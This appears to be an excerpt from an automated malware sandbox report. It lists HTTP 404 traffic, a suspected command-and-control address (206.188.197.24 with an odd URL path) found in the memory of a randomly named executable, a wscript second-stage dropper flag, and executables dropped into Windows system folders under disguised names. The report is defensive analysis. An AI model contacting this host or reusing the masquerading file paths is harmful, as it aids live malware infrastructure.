                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Fri, 03 Jan 2025 17:32:47 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Fri, 03 Jan 2025 17:32:54 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Fri, 03 Jan 2025 17:33:01 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Fri, 03 Jan 2025 17:33:08 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Fri, 03 Jan 2025 17:33:15 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Fri, 03 Jan 2025 17:33:22 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Fri, 03 Jan 2025 17:33:28 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Fri, 03 Jan 2025 17:33:38 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Fri, 03 Jan 2025 17:33:45 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Fri, 03 Jan 2025 17:33:55 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                    Source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000009.00000002.1759792480.000000000287D000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000000F.00000002.1875842793.0000000002DBD000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000016.00000002.1943857058.0000000002F27000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000001B.00000002.2009516742.00000000030C7000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000020.00000002.2076714879.0000000003527000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000025.00000002.2189053603.0000000002B07000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000002A.00000002.2256531415.0000000002FF7000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000002F.00000002.2323301689.0000000003047000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000034.00000002.2398807825.0000000003017000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000039.00000002.2466038255.0000000002D87000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000003F.00000002.2531748971.0000000002BD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.188.197.24
                                    Source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000003F.00000002.2531748971.0000000002BD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.188.197.24/Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti
                                    Source: winIntorefruntimebroker.exe, 00000004.00000002.1691880334.0000000004042000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000009.00000002.1759792480.000000000287D000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000000F.00000002.1875842793.0000000002DBD000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000016.00000002.1943857058.0000000002F27000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000001B.00000002.2009516742.00000000030C7000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000020.00000002.2076714879.0000000003527000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000025.00000002.2189053603.0000000002B07000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000002A.00000002.2256531415.0000000002FF7000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000002F.00000002.2323301689.0000000003047000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000034.00000002.2398807825.0000000003017000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000039.00000002.2466038255.0000000002D87000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000003F.00000002.2531748971.0000000002BD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

                                    System Summary

                                    barindex
                                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                                    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002D6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_002D6FAA
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeFile created: C:\Windows\INF\fXvSafnhbinoSxnWSYFNsCJETLnb.exeJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeFile created: C:\Windows\INF\e226a7d7102d53Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeFile created: C:\Windows\en-GB\fXvSafnhbinoSxnWSYFNsCJETLnb.exeJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeFile created: C:\Windows\en-GB\e226a7d7102d53Jump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002D848E0_2_002D848E
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002E00B70_2_002E00B7
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002E40880_2_002E4088
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002D40FE0_2_002D40FE
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002E71530_2_002E7153
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002F51C90_2_002F51C9
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002D32F70_2_002D32F7
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002E62CA0_2_002E62CA
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002E43BF0_2_002E43BF
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002DC4260_2_002DC426
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002DF4610_2_002DF461
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002FD4400_2_002FD440
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002E77EF0_2_002E77EF
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002D286B0_2_002D286B
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002FD8EE0_2_002FD8EE
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002DE9B70_2_002DE9B7
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_003019F40_2_003019F4
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002E6CDC0_2_002E6CDC
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002E3E0B0_2_002E3E0B
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002F4F9A0_2_002F4F9A
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002DEFE20_2_002DEFE2
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeCode function: 4_2_00007FFD9B880D704_2_00007FFD9B880D70
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 9_2_00007FFD9BAB0D709_2_00007FFD9BAB0D70
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 15_2_00007FFD9BB1CB4115_2_00007FFD9BB1CB41
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 15_2_00007FFD9BB14BEB15_2_00007FFD9BB14BEB
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 15_2_00007FFD9BACD7B615_2_00007FFD9BACD7B6
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 15_2_00007FFD9BAFA4C715_2_00007FFD9BAFA4C7
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 15_2_00007FFD9BB0A38915_2_00007FFD9BB0A389
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 15_2_00007FFD9BAB0D7015_2_00007FFD9BAB0D70
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 15_2_00007FFD9BACBD2D15_2_00007FFD9BACBD2D
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 22_2_00007FFD9BABD7B622_2_00007FFD9BABD7B6
